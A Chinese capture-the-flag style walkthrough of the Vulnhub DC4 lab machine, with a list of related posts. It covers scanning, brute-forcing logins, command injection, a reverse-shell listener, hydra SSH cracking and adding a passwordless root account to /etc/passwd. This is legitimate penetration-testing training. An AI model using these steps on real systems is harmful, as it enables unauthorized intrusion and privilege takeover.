信息收集

fscan扫描存活主机

PS C:\Users\lenovo\Desktop\HackTool> .\fscan64.exe -h 192.168.1.0/24___                              _/ _ \     ___  ___ _ __ __ _  ___| | __/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\fscan version: 1.8.2
start infoscan
(icmp) Target 192.168.1.53    is alive
(icmp) Target 192.168.1.108   is alive
(icmp) Target 192.168.1.1     is alive
(icmp) Target 192.168.1.104   is alive
(icmp) Target 192.168.1.105   is alive
(icmp) Target 192.168.1.109   is alive
[*] Icmp alive hosts len is: 6

确定目标主机是192.168.1.105

namp扫描端口

 nmap -A 192.168.1.105 -p-
Starting Nmap 7.92 ( https://nmap.org ) at 2023-03-20 10:11 CST
Nmap scan report for 192.168.1.105
Host is up (0.00058s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
|   2048 8d:60:57:06:6c:27:e0:2f:76:2c:e6:42:c0:01:ba:25 (RSA)
|   256 e7:83:8c:d7:bb:84:f3:2e:e8:a2:5f:79:6f:8e:19:30 (ECDSA)
|_  256 fd:39:47:8a:5e:58:33:99:73:73:9e:22:7f:90:4f:4b (ED25519)
80/tcp open  http    nginx 1.15.10
|_http-title: System Tools
|_http-server-header: nginx/1.15.10
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.24 seconds
zsh: segmentation fault  nmap -A 192.168.1.105 -p-

开放了22和80端口,直接访问web服务

就一个登录框

暴力破解

直接爆破密码

爆出密码是happy

命令执行

登进去一看是命令执行漏洞

抓包修改参数,查看用户

查看到有三个用户,charles、jim、sam

nc反弹shell

nc -lvp 9999

python切换shell

python3 -c "import pty;pty.spawn('/bin/bash')"

在/home/jim目录下发现文件old-passwords.bak文件,查看,可以作为爆破ssh的密码字典

复制保存到kali

爆破ssh

└─$ sudo hydra -l jim -P pass.txt ssh://192.168.1.105                                    

最后密码是jibril04

登录提示you have mail

存在Charles的密码Password is: ^xHhA&hvim0y

切换用户

su charles

sudo提权

sudo -l

有最追加写入文件功能的时候,直接往 /etc/passwd 里加个root用户

teehee提权

passwd的格式:[⽤户名]:[密码]:[UID]:[GID]:[⾝份描述]:[主⽬录]:[登录shell]
echo "yesir::0:0:::/bin/bash" | sudo teehee -a /etc/passwd

flag

他帮你驱散黑暗,我却带给你光明。可,你心里没有我

渗透测试靶机vulnhub——DC4实战笔记相关推荐

  1. 看完这篇 教你玩转渗透测试靶机vulnhub——DC9

    Vulnhub靶机DC9渗透测试详解 Vulnhub靶机介绍: Vulnhub靶机下载: Vulnhub靶机安装: Vulnhub靶机漏洞详解: ①:信息收集: ②:SQL注入: ③:文件包含: ④: ...

  2. 看完这篇 教你玩转渗透测试靶机vulnhub——DC1

    Vulnhub靶机DC1渗透测试详解 Vulnhub靶机介绍: Vulnhub靶机下载: Vulnhub靶机安装: Vulnhub靶机漏洞详解: ①:信息收集: ②:漏洞发现: ③:漏洞利用: ④:S ...

  3. 看完这篇 教你玩转渗透测试靶机vulnhub——DC3

    Vulnhub靶机DC3渗透测试详解 Vulnhub靶机介绍: Vulnhub靶机下载: Vulnhub靶机安装: Vulnhub靶机漏洞详解: ①:信息收集: ②:漏洞发现: ③:SQL注入: ④: ...

  4. 看完这篇 教你玩转渗透测试靶机vulnhub——DC7

    Vulnhub靶机DC7渗透测试详解 Vulnhub靶机介绍: Vulnhub靶机下载: Vulnhub靶机安装: Vulnhub靶机漏洞详解: ①:信息收集: ②:SSH登入: ③:漏洞发现与利用: ...

  5. 看完这篇 教你玩转渗透测试靶机vulnhub——My File Server: 2

    Vulnhub靶机My File Server: 2渗透测试详解 Vulnhub靶机介绍: Vulnhub靶机下载: Vulnhub靶机安装: Vulnhub靶机漏洞详解: ①:信息收集: ②:FTP ...

  6. 看完这篇 教你玩转渗透测试靶机vulnhub——My File Server: 1

    Vulnhub靶机My File Server: 1渗透测试详解 Vulnhub靶机介绍: Vulnhub靶机下载: Vulnhub靶机安装: Vulnhub靶机漏洞详解: ①:信息收集: ②:FTP ...

  7. 看完这篇 教你玩转渗透测试靶机vulnhub——MoneyBox: 1

    Vulnhub靶机MoneyBox: 1渗透测试详解 Vulnhub靶机介绍: Vulnhub靶机下载: Vulnhub靶机安装: Vulnhub靶机漏洞详解: ①:信息收集: ②:FTP匿名登入: ...

  8. 看完这篇 教你玩转渗透测试靶机vulnhub——FunBox4(CTF)

    Vulnhub靶机FunBox4(CTF)渗透测试详解 Vulnhub靶机介绍: Vulnhub靶机下载: Vulnhub靶机安装: Vulnhub靶机漏洞详解: ①:信息收集: ②:文件上传 Get ...

  9. 看完这篇 教你玩转渗透测试靶机vulnhub——Source:1

    Vulnhub靶机Source:1渗透测试详解 Vulnhub靶机介绍: Vulnhub靶机下载: Vulnhub靶机安装: Vulnhub靶机漏洞详解: ①:信息收集: ②:远程命令执行漏洞 CVE ...

最新文章

  1. 增强型固态硬盘支持人工智能工作负载
  2. sass @function,@for,@mixin 的应用
  3. center6linux ip设置,centos6固定ip地址
  4. 字典树实现_反怼面试官系列之 字典树
  5. Android init第三、四部分详细分析
  6. 字符集编码详解【ASCII 、GB2312、GBK、GB18030、unicode、UTF-8】(转)
  7. leetcode 446. Arithmetic Slices II - Subsequence | 446. 等差数列划分 II - 子序列(动态规划)
  8. 还要什么ETL?它是搭建数据仓库的必备,许多人都不知道!
  9. 学习有五个层次和境界
  10. 单链表尾指针要置为空?为什么单链表建立完以后,比如p指向尾节点,要加上一句p-next=NULL;?
  11. 关于原理图库和封装库设计(三)
  12. USB转232和485的区别
  13. 分库分表中间件常见方案对比分析
  14. bzoj 1779: [Usaco2010 Hol]Cowwar 奶牛战争 (网络流)
  15. element-upload 自定义上传、限制文件大小、格式以及图片尺寸
  16. clear:both在HTML页面中的用法
  17. [转载]【职场新人必看】领导谆谆寄语
  18. 基于yolov5与改进VGGNet的车辆多标签实时识别算法
  19. DSP仿真器的必要性及原理
  20. vue中watch的初次监听和深度监听

热门文章

  1. java项目——Dom4j读取XML文件保存orecal数据库
  2. uos专业版激活_UOS V20专业版新增了什么,UOS更新内容一览
  3. Python计时库——Time库的使用详解
  4. 李琰php_李琰:贰拾年一觉轮滑梦
  5. MQTT协议详解,非常易懂
  6. Raphael绘制流程图(二),添加带箭头的直线
  7. MT6771/6761/6762 安卓手机主板 dconfig 控制 mrdump 开关去除 SOCID 绑定
  8. 最新微信ipad协议, CODE获取 公众号授权等
  9. Android开发:使用Viewpager模仿驾考宝典试卷答题界面
  10. 在win7下配置Geany,使其使用 Python 3